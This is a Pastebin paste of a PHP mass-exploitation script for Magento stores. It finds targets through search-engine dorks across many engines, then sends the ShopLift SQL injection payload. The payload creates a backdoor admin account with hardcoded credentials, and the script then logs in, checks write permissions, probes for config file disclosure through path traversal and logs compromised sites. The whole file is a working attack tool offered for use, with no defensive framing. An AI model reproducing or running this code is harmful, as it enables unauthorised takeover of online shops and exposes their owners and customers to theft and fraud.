
Magento Shell Admin

Jan 28th, 2017
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.14 KB | None | 0 0
  1. <?php
  2. // Lo Bacod Bangsat
  3. set_time_limit(0);
  4. class PakHaxor {
  5. private $dork = "";
  6. private $username = "acid";//user passmu ganti
  7. private $password = "Acid123!!";
  9. public function Dork($dork){
  10. $this->dork = $dork;
  11. return $this->dork;
  12. }
  14. private function CurlPost($url, $post = false){
  15. $ch = curl_init();
  16. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  17. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  18. curl_setopt($ch, CURLOPT_URL, $url);
  19. curl_setopt($ch, CURLOPT_HEADER, 0);
  20. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  21. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  22. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  23. if($post !== false){
  24. $isi = '';
  25. foreach($post as $key=>$value){
  26. $isi .= $key.'='.$value.'&';
  27. }
  28. rtrim($isi, '&');
  29. curl_setopt($ch, CURLOPT_URL, $url);
  30. curl_setopt($ch, CURLOPT_POST, count($isi));
  31. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  32. curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
  33. }
  34. $data = curl_exec($ch);
  35. curl_close($ch);
  36. return $data;
  37. }
  39. private function GetStr($start,$end,$string){
  40. $a = explode($start,$string);
  41. $b = explode($end,$a[1]);
  42. return $b[0];
  43. }
  45. private function LoginDownloader($url){
  46. $link = parse_url($url);
  47. $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
  48. array("username" => $this->username,
  49. "password" => $this->password)
  50. );
  51. if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
  52. $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
  53. return "Success\nPermission\t\t: ".$permission;
  54. $smtp = (!eregi("Smtp",$data) || !eregi("Mandrill",$data) || !eregi("smtp",$data) ? "Smtp Look" : "Ga Ada Smtp");
  55. return "Success\nSmtpPro\t\t: ".$smtp;
  56. $filesystem = (!eregi("File_System",$data) ? "File System Ada" : "No");
  57. return "Success\nFile system\t\t: ".$filesystem;
  58. } else {
  59. return "Failed";
  60. }
  61. }
  63. private function LoginAdmin($target){
  64. $link = parse_url($target);
  65. $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
  66. $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
  67. $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
  68. array("login[username]" => $this->username,
  69. "login[password]" => $this->password,
  70. "form_key" => $key)
  71. );
  72. if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
  73. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t:".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
  74. } else {
  75. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
  76. }
  77. }
  79. private function ShopLiftExploit($target){
  80. $email = substr(md5(time()),2,15);
  81. $link = parse_url($target);
  82. $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
  83. array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
  84. "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
  85. "forwarded" => "1")
  86. );
  87. return (@imagecreatefromstring($data) !== false);
  88. }
  90. private function ExecuteExploit($victim){
  91. $file = fopen("ShopLift-".date("d-m-Y").".log","a");
  92. $url = parse_url($victim);
  93. $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
  94. if($this->ShopLiftExploit($target)){
  95. $downloader = $this->LoginDownloader($target);
  96. $admin = $this->LoginAdmin($target);
  97. $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
  98. fwrite($file,$result);
  99. return $result;
  100. }else {
  101. return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
  102. }
  104. fclose($file);
  105. }
  108. private function LocalFileDiscloure($target){
  109. $path = array( "/app/etc/local.xml",
  110. "/magmi/web/download_file.php?file=../../app/etc/local.xml"
  111. );
  112. for($i=0;$i<=count($path);$i++){
  113. $test = $this->CurlPost($target.$path[$i]);
  114. if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
  115. return $this->GetStr("<date><![CDATA[","]]></date>",$test);
  116. } else {
  117. return false;
  118. }
  119. }
  120. }
  122. public function SearchEngine($engine){
  123. $list = array();
  124. $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
  125. $ccgoogle = array("ae");//,"","","","am","","as","at","","az","ba","","be","bg","bi","","","bs","","","ca","cd","cg","ch","ci","","cl","","","","de","dj","dk","dm","","","es","","fi","","fm","fr","gg","","gl","gm","gr","","","hn","hr","","","ie","","","","is","it","","","jo","","","kg","","kz","li","lk","","lt","lu","lv","","mn","ms","","mu","mw","","","","","","nl","no","","nr","nu","","","","","","","pl","pn","","pt","","ro","ru","rw","","","sc","se","","sh","sk","sn","sm","","","","tm","to","tp","","tt","","","","","","uz","","","vg","","","vu","ws","","");
  126. $ccask = array("au","uk","ca","de","it","fr","es","ru","nl","pl","at","se","dk","no","br","mx","jp");
  127. $ccyahoo = array("au","ru","at","pl","il","tr","ua","gr","jp","cn","my","id","th","in","kr","tw","ro","za","pt","ca","uk","de","fr","es","it","hk","mx","br","ar","nl","dk","ph","cl","ru","co","fi","ve","nz","pe");
  128. switch($engine){
  129. case 1:
  130. for($i=0;$i<=1000;$i+=10){
  131. $search = $this->CurlPost("".urlencode($this->dork)."&first=".$i);
  132. preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
  133. foreach($m[1] as $link){
  134. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  135. if(!in_array($link,$list)){
  136. $list[] = $link;
  137. }
  138. }
  139. }
  140. echo "[".date("H:i:s")."] Catch Bing (".count(array_unique($m[1])).")\n";
  141. }
  142. echo "[".date("H:i:s")."] Total Bing : ".count($list)."\n";
  143. break;
  144. case 2:
  145. for($x=0;$x<=count($ccbing)-1;$x++){
  146. for($i=0;$i<=1000;$i+=10){
  147. $search = $this->CurlPost("".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
  148. preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
  149. foreach($m[1] as $link){
  150. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  151. if(!in_array($link,$list)){
  152. $list[] = $link;
  153. }
  154. }
  155. }
  156. echo "[".date("H:i:s")."] Catch Bing.".$ccbing[$x]." (".count(array_unique($m[1])).")\n";
  157. }
  158. }
  159. echo "[".date("H:i:s")."] Total Bing World : ".count($list)."\n";
  160. break;
  161. case 3:
  162. for($x=0;$x<=count($ccgoogle)-1;$x++){
  163. for($i=0;$i<=200;$i+=10){
  164. $search = $this->CurlPost("".$ccgoogle[$x]."/search?num=50&q=".urlencode($this->dork)."&start=".$i."&sa=N");
  165. preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
  166. foreach($m[1] as $link){
  167. if(!preg_match("/google/",$link)){
  168. if(!in_array($link,$list)){
  169. $list[] = $link;
  170. }
  171. }
  172. }
  173. echo "[".date("H:i:s")."] Catch Google.".$ccgoogle[$x]." (".count(array_unique($m[1])).")\n";
  174. }
  175. }
  176. echo "[".date("H:i:s")."] Total Google World : ".count($list)."\n";
  177. break;
  178. case 4:
  179. for($x=0;$x<=count($ccask)-1;$x++){
  180. for($i=1;$i<=1000;$i+=100){
  181. $search = $this->CurlPost("http://".$ccask[$x]."".urlencode($this->dork)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  182. preg_match_all('/href=\"http:\/\/(.*?)\" onmousedown=/m', $search, $m);
  183. foreach($m[1] as $link){
  184. if(!preg_match("/ask\.com/",$link)){
  185. if(!in_array($link,$list)){
  186. $list[] = $link;
  187. }
  188. }
  189. }
  190. echo "[".date("H:i:s")."] Catch Ask.".$ccask[$x]."(".count(array_unique($m[1])).")\n";
  191. }
  192. }
  193. echo "[".date("H:i:s")."] Total Ask World : ".count($list)."\n";
  194. break;
  195. case 5:
  196. for($i=1;$i<=100;$i+=1){
  197. $search = $this->CurlPost("".urlencode($this->dork)."&type=text&page=".$i);
  198. preg_match_all('/<a href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  199. foreach($m[1] as $link){
  200. if(!preg_match("/walla\.co\.il/",$link)){
  201. if(!in_array($link,$list)){
  202. $list[] = $link;
  203. }
  204. }
  205. }
  206. echo "[".date("H:i:s")."] Catch Walla (".count(array_unique($m[1])).")\n";
  207. }
  208. echo "[".date("H:i:s")."] Total Walla : ".count($list)."\n";
  209. break;
  210. case 6:
  211. for($i=1;$i<=400;$i+=10){
  212. $search = $this->CurlPost("".$i.",query.html?qt=".urlencode($this->dork));
  213. preg_match_all('/<a href=\"http:\/\/(.*?)\">/m', $search, $m);
  214. foreach($m[1] as $link){
  215. if(!preg_match("/onet|webcache|query/",$link)){
  216. if(!in_array($link,$list)){
  217. $list[] = $link;
  218. }
  219. }
  220. }
  221. echo "[".date("H:i:s")."] Catch Onet (".count(array_unique($m[1])).")\n";
  222. }
  223. echo "[".date("H:i:s")."] Total Onet : ".count($list)."\n";
  224. break;
  225. case 7:
  226. for($i=1;$i<=50;$i+=1){
  227. $search = $this->CurlPost("".$i."&q=".urlencode($this->dork)."&st=local");
  228. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  229. foreach($m[1] as $link){
  230. if(!preg_match("/\.sapo\.pt/",$link)){
  231. if(!in_array($link,$list)){
  232. $list[] = $link;
  233. }
  234. }
  235. }
  236. echo "[".date("H:i:s")."] Catch Sapo (".count(array_unique($m[1])).")\n";
  237. }
  238. echo "[".date("H:i:s")."] Total Sapo : ".count($list)."\n";
  239. break;
  240. case 8:
  241. for($i=1;$i<=50;$i+=1){
  242. $search = $this->CurlPost("".urlencode($this->dork)."&pn=".$i);
  243. preg_match_all('/title=\"http:\/\/(.*?)\"/m', $search, $m);
  244. foreach($m[1] as $link){
  245. if(!preg_match("/lycos/",$link)){
  246. if(!in_array($link,$list)){
  247. $list[] = $link;
  248. }
  249. }
  250. }
  251. echo "[".date("H:i:s")."] Catch Lycos (".count(array_unique($m[1])).")\n";
  252. }
  253. echo "[".date("H:i:s")."] Total Lycos : ".count($list)."\n";
  254. break;
  255. case 9:
  256. for($i=1;$i<=1000;$i+=10){
  257. $search = $this->CurlPost("".urlencode($this->dork)."&start=".$i);
  258. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  259. foreach($m[1] as $link){
  260. if(!preg_match("/uol\.com\.br|\/web/i",$link)){
  261. if(!in_array($link,$list)){
  262. $list[] = $link;
  263. }
  264. }
  265. }
  266. echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
  267. }
  268. echo "[".date("H:i:s")."] Total Uol : ".count($list)."\n";
  269. break;
  270. case 10:
  271. for($i=1;$i<=300;$i+=20){
  272. $search = $this->CurlPost("".urlencode($this->dork)."&count=20&from=".$i);
  273. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  274. foreach($m[1] as $link){
  275. if(!preg_match("/seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i",$link)){
  276. if(!in_array($link,$list)){
  277. $list[] = $link;
  278. }
  279. }
  280. }
  281. echo "[".date("H:i:s")."] Catch Seznam (".count(array_unique($m[1])).")\n";
  282. }
  283. echo "[".date("H:i:s")."] Total Seznam : ".count($list)."\n";
  284. break;
  285. case 11:
  286. for($i=1;$i<=50;$i+=1){
  287. $search = $this->CurlPost("".$i."&q=".urlencode($this->dork));
  288. preg_match_all('/href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  289. foreach($m[1] as $link){
  290. if(!preg_match("/hotbot\.com/",$link)){
  291. if(!in_array($link,$list)){
  292. $list[] = $link;
  293. }
  294. }
  295. }
  296. echo "[".date("H:i:s")."] Catch Hotbot (".count(array_unique($m[1])).")\n";
  297. }
  298. echo "[".date("H:i:s")."] Total Hotbot : ".count($list)."\n";
  299. break;
  300. case 12:
  301. for($i=1;$i<=300;$i+=10){
  302. $search = $this->CurlPost("".urlencode($this->dork)."&page=".$i);
  303. preg_match_all('/href=\"http:\/\/(.*?)\"/m', $search, $m);
  304. foreach($m[1] as $link){
  305. if(!preg_match("/aol\.com/",$link)){
  306. if(!in_array($link,$list)){
  307. $list[] = $link;
  308. }
  309. }
  310. }
  311. echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
  312. }
  313. echo "[".date("H:i:s")."] Total Aol : ".count($list)."\n";
  314. break;
  315. case 13:
  316. for($i=1;$i<=1000;$i+=10){
  317. $search = $this->CurlPost("".urlencode($this->dork)."&b=".$i);
  318. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  319. foreach($m[1] as $link){
  320. if(!preg_match("/yahoo/",$link)){
  321. if(!in_array($link,$list)){
  322. $list[] = $link;
  323. }
  324. }
  325. }
  326. echo "[".date("H:i:s")."] Catch Yahoo (".count(array_unique($m[1])).")\n";
  327. }
  328. echo "[".date("H:i:s")."] Total Yahoo : ".count($list)."\n";
  329. break;
  330. case 14:
  331. for($x=0;$x<=count($ccyahoo)-1;$x++){
  332. for($i=1;$i<=1000;$i+=100){
  333. $search = $this->CurlPost("http://".$ccyahoo[$x].";_ylt=A0geu8nrPalPnkQAVmPrFAx.?p=".urlencode($this->dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vst=0&vf=all&vc=hk&vm=p&fl=0&fr=yfp-t-501&fp_ip=11&xargs=0&pstart=1&b=".$i);
  334. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  335. foreach($m[1] as $link){
  336. if(!preg_match("/yahoo".$ccyahoo[$x]."/",$link)){
  337. if(!in_array($link,$list)){
  338. $list[] = $link;
  339. }
  340. }
  341. }
  342. echo "[".date("H:i:s")."] Catch Yahoo.".$ccyahoo[$x]." (".count(array_unique($m[1])).")\n";
  343. }
  344. }
  345. echo "[".date("H:i:s")."] Total Yahoo World : ".count($list)."\n";
  346. break;
  347. }
  348. if(count($list)>0){
  349. echo "Exploiting target ".count($list).". Please wait ... \n";
  350. foreach($list as $do){
  351. echo $this->ExecuteExploit($do);
  352. }
  353. }
  354. }
  356. public function ExploitLogo(){
  357. $logo = "==================================================\n";
  358. $logo .= "#\t Magento ShopLift Auto Exploiter \t #\n";
  359. $logo .= "#------------------------------------------------#\n";
  360. $logo .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
  361. $logo .= "#------------------------------------------------#\n";
  362. $logo .= "#\t (C) ".date("Y")." Recoded By Mr. Haxor \t\t #\n";
  363. $logo .= "==================================================\n";
  364. echo $logo;
  365. }
  366. }
  367. $Exploiter = new PakHaxor();
  368. if(isset($argv[1]) && !empty($argv[1])){
  369. if($argv[1]=="-l" && !empty($argv[2])){
  370. $file = file_get_contents($argv[2]);
  371. $list = explode("\n",$file);
  372. if(isset($list)){
  373. echo "Starting engine ....\n";
  374. flush();
  375. sleep(2);
  376. echo "[".date("H:i:s")."] Scanning ".count($list)." dorks. Please wait ... \n";
  377. foreach($list as $dork){
  378. echo "[".date("H:i:s")."] Scanning target for dork : {$dork}\n";
  379. $Exploiter->Dork($dork);
  380. for($i=0;$i<15;$i++){
  381. $Exploiter->SearchEngine($i);
  382. flush();
  383. sleep(1);
  384. }
  385. }
  386. }
  387. } else {
  388. echo "Starting engine ....\n";
  389. flush();
  390. sleep(2);
  391. echo "[".date("H:i:s")."] Scanning target for dork : {$argv[1]}\n";
  392. $Exploiter->Dork($argv[1]);
  393. for($i=0;$i<15;$i++){
  394. $Exploiter->SearchEngine($i);
  395. flush();
  396. sleep(1);
  397. }
  398. }
  399. echo "Scan finished !!!\n";
  400. flush();
  401. sleep(1);
  402. echo "Shuting down engine !!!\n";
  403. } else {
  404. $Exploiter->ExploitLogo();
  405. }
Add Comment
Please, Sign In to add comment